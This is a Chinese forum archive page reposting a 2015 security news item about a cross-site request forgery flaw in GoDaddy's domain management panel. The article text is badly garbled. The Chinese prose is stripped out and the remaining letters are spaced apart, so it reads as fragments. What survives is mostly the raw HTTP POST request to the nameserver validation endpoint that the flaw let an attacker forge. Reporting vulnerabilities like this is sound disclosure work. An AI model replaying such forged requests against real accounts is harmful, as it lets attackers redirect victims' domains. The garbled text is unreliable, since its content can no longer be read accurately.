搜索

[8610] 2015-01-21_全球最大域名提供商GoDaddy存在跨站请求伪造(CSRF)漏洞

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-17
2015-01-21_全球最大域名提供商GoDaddy存在跨站请求伪造(CSRF)漏洞 G o D a d d y C S R F F r e e B u f   2 0 1 5 - 0 1 - 2 1 D y l a n   S a c c o m a n n i G o D a d d y C S R F G o D a d d y G o d a d d y , S a c c o m a n n i 1 1 7 X S S C S R F P O S T P O S T / d c c 5 0 / M o d a l s / D o m a i n A c t i o n s / N S M a n a g e W S . a s m x / V a l i d a t e N a m e s e r v e r   H T T P / 1 . 1 H o s t :   d c c . g o d a d d y . c o m U s e r - A g e n t : M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 1 0 ;   r v : 3 4 . 0 )   G e c k o / 2 0 1 0 0 1 0 1 F i r e f o x / 3 4 . 0 A c c e p t : a p p l i c a t i o n / j s o n ,   t e x t / j a v a s c r i p t ,   * / * ;   q = 0 . 0 1 A c c e p t - L a n g u a g e : e n - U S , e n ; q = 0 . 5 A c c e p t - E n c o d i n g : g z i p ,   d e f l a t e C o n t e n t - T y p e : a p p l i c a t i o n / j s o n ;   c h a r s e t = u t f - 8 X - R e q u e s t e d - W i t h : X M L H t t p R e q u e s t C o n t e n t - L e n g t h :   1 7 5 C o o k i e :   [ R E D A C T E D ] C o n n e c t i o n :   k e e p - a l i v e P r a g m a :   n o - c a c h e C a c h e - C o n t r o l : n o - c a c h e   { ' r e q u e s t ' : ' { " i s a l l " : f a l s e , " n s o b j s " : [ { " n s " : " f o o . e x a m p l e . c o m " , " i p s " : [ ] , " i n d e x " : 0 , " a d d " : 1 , " s t a t u s " : " " } , { " n s " : " b a r . e x a m p l e . c o m " , " i p s " :   [ ] , " i n d e x " : 1 , " a d d " : 1 , " s t a t u s " : " " } ] } ' } 1 8 G o D a d d y 1 9 [ s e c u r i t y a f f a i r s , F r e e B u f F r e e B u f . C O M   ]
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理